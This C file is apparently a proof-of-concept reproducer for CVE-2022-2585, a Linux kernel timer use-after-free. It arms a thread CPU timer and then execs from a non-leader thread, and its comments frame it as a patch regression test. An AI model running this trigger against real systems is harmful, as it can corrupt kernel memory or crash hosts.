CVE-2022-2585.c
#define _GNU_SOURCE
#include <sched.h>
#include <time.h>
#include <unistd.h>
#include <sys/wait.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
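/*
 * Thread entry point that main() hands to clone().
 *
 * Per the file name this is a reproducer for CVE-2022-2585, which is publicly
 * described as a Linux kernel use-after-free in POSIX CPU timer handling when
 * a non-leader thread calls exec while one of its CPU timers is still armed.
 * The function creates a timer on the calling thread's CPU-time clock
 * (CLOCK_THREAD_CPUTIME_ID), arms it with a 3 s first expiry and a 3 s
 * interval, and then execs ./poc with argv[0] set to "poc1".
 *
 * Defensive use: run it only in a disposable test VM, to confirm that a
 * kernel carrying the vendor fix for this CVE no longer misbehaves. A
 * memory-debugging kernel (e.g. KASAN) is the reliable way to observe the
 * fault; the absence of a crash alone is not proof of a fixed kernel.
 *
 * @param d  unused (clone() passes NULL).
 * @return   never returns: either exec succeeds, or the process is ended
 *           with EXIT_FAILURE.
 */
static int timer_uaf(void *d)
{
    (void)d;

    timer_t tid;
    const struct itimerspec its = {
        .it_interval = { .tv_sec = 3, .tv_nsec = 0 },
        .it_value    = { .tv_sec = 3, .tv_nsec = 0 },
    };

    /* Only exec when the timer really is armed; otherwise the run would
     * test nothing and could be misread as "kernel not affected". */
    if (timer_create(CLOCK_THREAD_CPUTIME_ID, NULL, &tid) == 0 &&
        timer_settime(tid, 0, &its, NULL) == 0) {
        /* The variadic list must end in a null *pointer*; a bare NULL may
         * be a plain integer 0 on some platforms. */
        execlp("./poc", "poc1", (char *)NULL);
    }

    /*
     * Reached only when timer setup or exec failed. The original fell off
     * the end of a non-void function here. _exit() (exit_group on glibc)
     * ends the whole thread group, so the spinning main thread does not
     * keep running after a failed attempt.
     */
    _exit(EXIT_FAILURE);
}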
/* Backing storage for the stack of the thread that main() starts with
 * clone(); main() passes stack+4096 as the child's initial stack pointer. */
static char stack[8192];
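/*
 * Driver for the CVE-2022-2585 reproducer (CVE id taken from the file name).
 *
 * Two roles, selected by argv[0]:
 *   - "poc1": the image started by timer_uaf()'s exec (presumably this same
 *     binary built as ./poc); it sleeps 2 s and exits 0.
 *   - anything else: fork once; the parent only waits for the child, and the
 *     child starts timer_uaf() in a second thread of its thread group
 *     (CLONE_THREAD) and then spins.
 *
 * Intended for kernel regression testing in a throwaway VM only.
 *
 * @return 0 in the "poc1" role and in the waiting parent; EXIT_FAILURE if
 *         fork() or clone() fails.
 */
int main(int argc, char **argv)
{
    /* argv[0] may legally be absent (argc == 0); guard before strcmp(). */
    if (argc > 0 && argv[0] != NULL && strcmp(argv[0], "poc1") == 0) {
        sleep(2);
        exit(0);
    }

    pid_t child = fork();
    if (child < 0) {
        /* Previously a failed fork() fell through into the child path. */
        exit(EXIT_FAILURE);
    }
    if (child > 0) {
        /* Parent: just reap the child so the shell sees the run finish. */
        waitpid(-1, NULL, 0);
        exit(0);
    }

    /*
     * Child: start timer_uaf() as a non-leader thread sharing this address
     * space. The stack pointer is the midpoint of the 8192-byte buffer, so
     * the new thread has the lower 4096 bytes to grow into.
     */
    if (clone(timer_uaf, stack + 4096,
              SIGCHLD | CLONE_VM | CLONE_SIGHAND | CLONE_THREAD,
              NULL, NULL, NULL) == -1) {
        exit(EXIT_FAILURE);
    }

    /* Nothing in this function ends the loop; the thread leader stays
     * alive here while the cloned thread runs. */
    while (1)
        ;

    return 0;
}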